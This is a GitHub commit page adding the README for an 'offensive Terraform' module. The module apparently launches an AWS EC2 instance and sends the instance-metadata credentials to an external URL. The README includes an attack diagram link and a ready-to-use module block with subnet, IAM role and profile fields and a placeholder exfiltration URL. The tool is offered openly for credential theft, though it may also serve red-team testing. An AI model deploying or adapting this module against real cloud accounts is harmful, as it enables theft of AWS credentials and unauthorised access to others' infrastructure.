Skip to content

Commit 8fe458a

Browse files
committed
Add README.md
1 parent 78673f5 commit 8fe458a

File tree

1 file changed

+23
-0
lines changed

1 file changed

+23
-0
lines changed

README.md

Lines changed: 23 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,23 @@
1+
# AWS EC2 Instance Credential Exfiltration Module
2+
3+
![OffensiveTerraform](https://img.shields.io/badge/offensive-terraform-purple)
4+
5+
Offensive Terraform module which creates EC2 instance and exfilrate credential from Instance metadata to external URL.
6+
7+
![Attack Diagram](https://github.com/offensive-terraform/terraform-aws-ec2-instance-credential-exfiltration/blob/master/diagram.jpg)
8+
9+
## Usage
10+
```
11+
module "ec2_instance_credential_exfiltration" {
12+
source = "offensive-terraform/terraform-aws-ec2-instance-credential-exfiltration"
13+
14+
subnet_id = "subnet-0a4a1cc04"
15+
url = "http://0.0.0.0/
16+
iam_role= "ec2-instance-role"
17+
iam_instance_profile = "ec2-instance-profile"
18+
}
19+
```
20+
## Author
21+
Module managed by https://github.com/offensive-terraform/
22+
23+

0 commit comments

Comments
 (0)